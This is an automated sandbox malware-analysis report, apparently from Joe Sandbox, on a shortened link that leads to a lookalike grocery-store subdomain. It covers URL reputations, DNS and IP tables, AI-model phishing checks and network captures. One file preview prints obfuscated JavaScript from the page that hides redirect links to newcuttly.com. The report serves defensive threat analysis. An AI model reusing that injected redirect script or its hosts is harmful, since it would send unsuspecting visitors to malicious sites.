http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/fonts/star.eot?#iefix0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/woocomm-popup-cart-ajax/assets/perfect-scrollbar/css/cus0%Avira URL Cloudsafe
https://www.gardenfresheg.com/wp-content/uploads/2024/02/Garden-fresh-logo.jpg0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.10%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/woocomm-popup-cart-ajax/assets/css/fonts.css?ver=6.4.30%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/bootstrap/js/bootstrap.js?ver=3.3.70%Avira URL Cloudsafe
https://gardenfresheg.com/2024/02/0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/woocomm-popup-cart-ajax/assets/perfect-scrollbar/js/perf0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/bootstrap/css/bootstrap.css?ver=4.00%Avira URL Cloudsafe
https://gardenfresheg.com/comments/feed/0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/themes/grocery-store/assets/js/grocery-store-woocommerce.js?ver=0%Avira URL Cloudsafe
https://gardenfresheg.com/sample-page/0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/customselect.js?ver=6.4.30%Avira URL Cloudsafe
https://gardenfresheg.com/category/uncategorized/0%Avira URL Cloudsafe
https://gardenfresheg.com/shop/0%Avira URL Cloudsafe
https://gardenfresheg.com/xmlrpc.php?rsd0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/woocomm-popup-cart-ajax/assets/js/woo-ajax-add-to-cart.j0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-includes/css/dashicons.min.css?ver=6.4.30%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/fonts/star.eot0%Avira URL Cloudsafe
https://gardenfresheg.com/hello-world/0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/aos-next/aos.css?ver=2.0.00%Avira URL Cloudsafe
https://gardenfresheg.com/product-category/olives/0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/fonts/star.woff0%Avira URL Cloudsafe
https://gardenfresheg.com/wp-content/uploads/2024/02/Garden-fresh-logo.jpg0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=8.0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/aos-next/aos.js?ver=6.4.30%Avira URL Cloudsafe
https://gardenfresheg.com/cart/0%Avira URL Cloudsafe
https://gardenfresheg.com/product-category/oils/0%Avira URL Cloudsafe
https://gardenfresheg.com/wp-content/plugins/advanced-product-search-for-woo/assets/images/loader.gi0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-201211050%Avira URL Cloudsafe
https://gardenfresheg.com/product-category/vinegar/0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/advanced-product-search-for-woo/assets/front/css/style.c0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/advanced-product-search-for-woo/assets/front/js/scripts.0%Avira URL Cloudsafe
https://gardenfresheg.com/how-to-make-apple-cider-vinegar/0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.10%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/variation-swatches-style/assets/css/frontend.css?ver=2010%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/rd-navbar/js/jquery.rd-navbar.js?ve0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/woocomm-popup-cart-ajax/assets/css/frontend.css?ver=6.4.0%Avira URL Cloudsafe
https://gardenfresheg.com/feed/0%Avira URL Cloudsafe
http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/fonts/star.svg#star0%Avira URL Cloudsafe
https://www.gardenfresheg.com/wp-content/plugins/advanced-product-search-for-woo/assets/images/loader.gif0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    high
    t.ly
    104.20.6.133
    truefalse
      high
      gardenfresheg.com
      185.230.63.171
      truefalse
        unknown
        s-part-0017.t-0009.t-msedge.net
        13.107.246.45
        truefalse
          high
          www.google.com
          172.217.18.100
          truefalse
            high
            td-ccm-neg-87-45.wixdns.net
            34.149.87.45
            truefalse
              high
              gardenfresheg.com.americanfoodeg.com
              192.185.17.40
              truefalse
                unknown
                fp2e7a.wpc.phicdn.net
                192.229.221.95
                truefalse
                  high
                  s-part-0032.t-0009.t-msedge.net
                  13.107.246.60
                  truefalse
                    high
                    www.gardenfresheg.com
                    unknown
                    unknownfalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://gardenfresheg.com/wp-content/uploads/2024/02/Garden-fresh-logo-100x100.jpgfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.gardenfresheg.com/wp-content/uploads/2024/02/Garden-fresh-logo-100x100.jpgfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://t.ly/X0-7Qfalse
                        high
                        https://gardenfresheg.com/wp-content/plugins/advanced-product-search-for-woo/assets/images/loader.giffalse
                        • Avira URL Cloud: safe
                        unknown
                        https://gardenfresheg.com.americanfoodeg.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9U0dsa1dtWT0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQfalse
                          unknown
                          https://www.gardenfresheg.com/wp-content/uploads/2024/02/Garden-fresh-logo.jpgfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://gardenfresheg.com/wp-content/uploads/2024/02/Garden-fresh-logo.jpgfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.gardenfresheg.com/wp-content/plugins/advanced-product-search-for-woo/assets/images/loader.giffalse
                          • Avira URL Cloud: safe
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://gardenfresheg.com/wp-includes/css/dist/block-library/style.min.css?ver=6.4.3chromecache_41.2.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://gardenfresheg.com/wp-content/themes/grocery-store/assets/css/grocery-store-common.css?ver=1.0chromecache_41.2.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://gardenfresheg.com/chromecache_41.2.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/owl-carousel/assets/owl.carousel.cschromecache_41.2.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://gardenfresheg.com/wp-includes/js/thickbox/thickbox.css?ver=6.4.3chromecache_41.2.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/fonts/star.ttfchromecache_41.2.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://wordpress.orgchromecache_41.2.drfalse
                            high
                            http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.js?chromecache_41.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://gardenfresheg.com/wp-content/themes/grocery-store/style.css?ver=1.0.0chromecache_41.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/owl-carousel/owl.carousel.js?ver=6.chromecache_41.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://gardenfresheg.com/product-category/pickles/chromecache_41.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://gardenfresheg.com/product-category/peppers/chromecache_41.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://gardenfresheg.com/my-account/chromecache_41.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://gardenfresheg.com/wp-json/chromecache_41.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://gmpg.org/xfn/11chromecache_41.2.drfalse
                              high
                              http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=8.chromecache_41.2.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://gardenfresheg.com/product-category/pancake-syrup/chromecache_41.2.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://gardenfresheg.com/wp-content/themes/grocery-store/woocommerce.css?ver=1.0.0chromecache_41.2.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://wordpress.org/themes/grocery-store/chromecache_41.2.drfalse
                                high
                                https://gardenfresheg.com/product-category/honey/chromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1chromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/sticky-sidebar/jquery.sticky-sidebachromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://gardenfresheg.com/product-category/uncategorized/chromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?vchromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://gardenfresheg.com/product-category/spreads/chromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://gardenfresheg.com/wp-content/plugins/wp-plugin-hostgator/vendor/newfold-labs/wp-module-patterchromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://gardenfresheg.com/wp-content/themes/grocery-store/assets/js/grocery-store.js?ver=1.0.0chromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://gardenfresheg.com/wp-content/plugins/woocomm-popup-cart-ajax/assets/js/frontend.js?ver=1.0.0chromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://gardenfresheg.com/product-category/natural-juice/chromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://gardenfresheg.com/wp-content/plugins/woocomm-popup-cart-ajax/assets/perfect-scrollbar/css/perchromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/rd-navbar/css/rd-navbar.css?ver=2.2chromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://gardenfresheg.com/product-category/sauces/chromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://gardenfresheg.com/checkout/chromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://gardenfresheg.com/wp-content/plugins/woocomm-popup-cart-ajax/assets/perfect-scrollbar/css/cuschromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/icofont/icofont.css?ver=1.0.1chromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://gardenfresheg.com/wp-content/plugins/variation-swatches-style/assets/js/frontend.js?ver=20160chromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://gardenfresheg.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1chromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/fonts/star.eot?#iefixchromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://gardenfresheg.com/wp-content/plugins/woocomm-popup-cart-ajax/assets/css/fonts.css?ver=6.4.3chromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/bootstrap/js/bootstrap.js?ver=3.3.7chromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://gardenfresheg.com/2024/02/chromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://gardenfresheg.com/wp-content/plugins/woocomm-popup-cart-ajax/assets/perfect-scrollbar/js/perfchromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/bootstrap/css/bootstrap.css?ver=4.0chromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://gardenfresheg.com/wp-content/themes/grocery-store/assets/js/grocery-store-woocommerce.js?ver=chromecache_41.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://api.w.org/chromecache_41.2.drfalse
                                  high
                                  https://gardenfresheg.com/comments/feed/chromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://gardenfresheg.com/shop/chromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://gardenfresheg.com/category/uncategorized/chromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/customselect.js?ver=6.4.3chromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://gardenfresheg.com/sample-page/chromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://gardenfresheg.com/xmlrpc.php?rsdchromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://gardenfresheg.com/wp-includes/css/dashicons.min.css?ver=6.4.3chromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://gardenfresheg.com/wp-content/plugins/woocomm-popup-cart-ajax/assets/js/woo-ajax-add-to-cart.jchromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/fonts/star.eotchromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://gardenfresheg.com/hello-world/chromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/aos-next/aos.css?ver=2.0.0chromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://gardenfresheg.com/product-category/olives/chromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/fonts/star.woffchromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/aos-next/aos.js?ver=6.4.3chromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=8.chromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://gardenfresheg.com/wp-content/plugins/advanced-product-search-for-woo/assets/images/loader.gichromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://gardenfresheg.com/cart/chromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://gardenfresheg.com/product-category/oils/chromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://gardenfresheg.com/product-category/vinegar/chromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://gardenfresheg.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105chromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://gardenfresheg.com/how-to-make-apple-cider-vinegar/chromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://gardenfresheg.com/wp-content/plugins/advanced-product-search-for-woo/assets/front/css/style.cchromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://gardenfresheg.com/wp-content/plugins/advanced-product-search-for-woo/assets/front/js/scripts.chromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://gardenfresheg.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1chromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?verchromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://gardenfresheg.com/wp-content/plugins/variation-swatches-style/assets/css/frontend.css?ver=201chromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://gardenfresheg.com/wp-content/themes/grocery-store/vendors/rd-navbar/js/jquery.rd-navbar.js?vechromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://gardenfresheg.com/wp-content/plugins/woocomm-popup-cart-ajax/assets/css/frontend.css?ver=6.4.chromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.chromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://gardenfresheg.com/wp-content/plugins/woocommerce/assets/fonts/star.svg#starchromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://gardenfresheg.com/feed/chromecache_41.2.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  104.20.6.133
                                  t.lyUnited States
                                  13335CLOUDFLARENETUSfalse
                                  185.230.63.171
                                  gardenfresheg.comIsrael
                                  58182WIX_COMILfalse
                                  192.185.17.40
                                  gardenfresheg.com.americanfoodeg.comUnited States
                                  46606UNIFIEDLAYER-AS-1USfalse
                                  239.255.255.250
                                  unknownReserved
                                  unknownunknownfalse
                                  34.149.87.45
                                  td-ccm-neg-87-45.wixdns.netUnited States
                                  2686ATGS-MMD-ASUSfalse
                                  172.217.18.100
                                  www.google.comUnited States
                                  15169GOOGLEUSfalse
                                  IP
                                  192.168.2.4
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1554542
                                  Start date and time:2024-11-12 16:40:07 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 3m 4s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:browseurl.jbs
                                  Sample URL:https://t.ly/X0-7Q
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:8
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal48.win@17/6@10/7
                                  EGA Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 192.229.221.95, 2.22.50.131, 2.22.50.144, 142.250.184.195, 172.217.18.110, 74.125.133.84, 34.104.35.123, 142.250.186.170, 142.250.186.35, 142.250.185.74, 142.250.186.106, 142.250.185.170, 142.250.185.138, 216.58.206.42, 142.250.185.202, 142.250.185.106, 142.250.186.74, 216.58.212.170, 142.250.184.234, 172.217.16.202, 172.217.23.106, 142.250.185.234, 172.217.18.106, 216.58.206.74, 20.12.23.50, 20.3.187.198, 172.202.163.200, 199.232.214.172, 20.109.210.53, 142.250.186.163
                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, clientservices.googleapis.com, a767.dspw65.akamai.net, clients2.google.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, fonts.gstatic.com, otelrules.azureedge.net, ctldl.windowsupdate.com, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, azureedge-t-prod.trafficmanager.net, clients.l.google.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: https://t.ly/X0-7Q
                                  TimeTypeDescription
                                  15:40:51Task SchedulerRun new task: {46B0A1E7-7C7F-4C0B-B676-C4D75639F795} path:
                                  InputOutput
                                  URL: https://gardenfresheg.com.americanfoodeg.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9U0dsa1dtWT0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ Model: claude-3-haiku-20240307
                                  ```json
                                  {
                                    "contains_trigger_text": false,
                                    "trigger_text": "unknown",
                                    "prominent_button_name": "unknown",
                                    "text_input_field_labels": "unknown",
                                    "pdf_icon_visible": false,
                                    "has_visible_captcha": false,
                                    "has_urgent_text": false,
                                    "has_visible_qrcode": false
                                  }
                                  URL: Model: claude-3-5-sonnet-latest
                                  {
                                      "typosquatting": false,
                                      "unusual_query_string": false,
                                      "suspicious_tld": false,
                                      "ip_in_url": false,
                                      "long_subdomain": true,
                                      "malicious_keywords": false,
                                      "encoded_characters": false,
                                      "redirection": false,
                                      "contains_email_address": false,
                                      "known_domain": false,
                                      "brand_spoofing_attempt": false,
                                      "third_party_hosting": true
                                  }
                                  URL: https://gardenfresheg.com.americanfoodeg.com
                                  URL: https://gardenfresheg.com.americanfoodeg.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9U0dsa1dtWT0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ Model: claude-3-haiku-20240307
                                  ```json
                                  {
                                    "brands": []
                                  }
                                  ```
                                  
                                  The provided image does not contain any visible brand logos or names. The page appears to be a generic e-commerce website with a search bar and a list of product categories, but no clear brand identities are displayed.
                                  No context
                                  No context
                                  No context
                                  No context
                                  No context
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:downloaded
                                  Size (bytes):44
                                  Entropy (8bit):4.644106550888951
                                  Encrypted:false
                                  SSDEEP:3:u1P4EcVBthYM/n:qD8d/n
                                  MD5:9D633AAD2113B83D8EB00DE6E5470C1E
                                  SHA1:4660D054CC6A8AC5E9B31A1E71D6D788FB9C1ADE
                                  SHA-256:567F97F904D46EBB536C38DA2DCB32F56A3193F5F41D71591CCB08D7144C340F
                                  SHA-512:E80FBA0AC2A357ECBB3586EDD76D21E5E0D0AEA12EC65533FF063FB562D3999D84DB697C758A6EDBA1C4D44F9EC063F0B30BAA09E9973926F5A834520D9AC57E
                                  Malicious:false
                                  Reputation:low
                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwkM58z_nhtQDBIFDRM0Cs4SBQ07Pky_EhAJdkyG8nSjjJISBQ0TNArO?alt=proto
                                  Preview:ChIKBw0TNArOGgAKBw07Pky/GgAKCQoHDRM0Cs4aAA==
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (9462), with CRLF, LF line terminators
                                  Category:downloaded
                                  Size (bytes):71120
                                  Entropy (8bit):5.654326322136021
                                  Encrypted:false
                                  SSDEEP:1536:yu7uyap3tVLeDLThRkGSPkNkAxmZVxHuyYzZNJGONvMh2MTVqPUmwpkfQ6ov4uD:ycMXVLeDPhRkPPkNkamZV1SFNJGONvM5
                                  MD5:01BCF7337EAF7287191174DD9A0F00C9
                                  SHA1:BF973353995BC8642F2596E1E4DE7DD1F8713237
                                  SHA-256:4981A1C6C40E070B90738D17DA74CAF936CDD96547E6A89B03F7086A54DE8A61
                                  SHA-512:386643C0F78E04BE6E81042312B41E1A090A600EE53BF3D5D2BC6F74FD573BE6F9FFAC959A2A04A68BC5D5ABA9690FA31681D065E0CA2A119FED478699427B5F
                                  Malicious:false
                                  Reputation:low
                                  URL:https://gardenfresheg.com.americanfoodeg.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9U0dsa1dtWT0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ
                                  Preview:<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x65\x77\x63\x75\x74\x74\x6c\x79\x2e\x63\x6f\x6d\x2f\x6e\x69\x4e\x33\x63\x343','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x65\x77\x63\x75\x74\x74\x6c\x79\x2e\x63\x6f\x6d\x2f\x4d\x71\x70\x35\x63\x305','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x65\x77\x63\x75\x74\x74\x6c\x79\x2e\x63\x6f\x6d\x2f\x54\x7a\x66\x38\x63\x368','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x65\x77\x63\x75\x74\x74\x6c\x79\x2e\x63\x6f\x6d\x2f\x67\x4c\x68\x39\x63\x399','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text
                                  Category:downloaded
                                  Size (bytes):17114
                                  Entropy (8bit):5.384252059348299
                                  Encrypted:false
                                  SSDEEP:384:MkaLn7W7eWZiLUIGVu27wZacBWMcPlOA1uCrDfxXvOZAMkwuUdb0Fqzzl:M1L7W6WZiwIUu6wgcsMQl31uaDfxfOZ1
                                  MD5:844FA0A42D5671E10CFFBB8CBB0700A8
                                  SHA1:E661170DAC0B58805F9FA762AD710D2C2B64EA8F
                                  SHA-256:D89C28B5F778BEF08F2BC820F70C03228E82545E3CACF62F2A31CE8E65304B30
                                  SHA-512:71D056A517D00E42B2781553993CC0D960E2FBC9E14813FFED4D52CD4CC7EB9702E1AD8CBB8C51770D1225380E87976F1BA5301EEE22634660B1CE832818B784
                                  Malicious:false
                                  Reputation:low
                                  URL:https://fonts.googleapis.com/css?family=K2D%3A300%2C400%2C500%2C600%2C700%7CRoboto%3A400%2C500%2C700%7CPoppins%3A400%2C500%2C700&display=swap&ver=6.4.3
                                  Preview:/* thai */.@font-face {. font-family: 'K2D';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/k2d/v11/J7aenpF2V0Er24c5h5Y91po.woff2) format('woff2');. unicode-range: U+02D7, U+0303, U+0331, U+0E01-0E5B, U+200C-200D, U+25CC;.}./* vietnamese */.@font-face {. font-family: 'K2D';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/k2d/v11/J7aenpF2V0Er24c5nJY91po.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-family: 'K2D';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/k2d/v11/J7aenpF2V0Er24c5nZY91po.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E0
                                  No static file info
                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 12, 2024 16:41:02.745281935 CET49675443192.168.2.4173.222.162.32
                                  Nov 12, 2024 16:41:05.674237013 CET49740443192.168.2.4104.20.6.133
                                  Nov 12, 2024 16:41:05.674285889 CET44349740104.20.6.133192.168.2.4
                                  Nov 12, 2024 16:41:05.674344063 CET49740443192.168.2.4104.20.6.133
                                  Nov 12, 2024 16:41:05.674479961 CET49741443192.168.2.4104.20.6.133
                                  Nov 12, 2024 16:41:05.674519062 CET44349741104.20.6.133192.168.2.4
                                  Nov 12, 2024 16:41:05.674577951 CET49741443192.168.2.4104.20.6.133
                                  Nov 12, 2024 16:41:05.674701929 CET49740443192.168.2.4104.20.6.133
                                  Nov 12, 2024 16:41:05.674715996 CET44349740104.20.6.133192.168.2.4
                                  Nov 12, 2024 16:41:05.674839020 CET49741443192.168.2.4104.20.6.133
                                  Nov 12, 2024 16:41:05.674850941 CET44349741104.20.6.133192.168.2.4
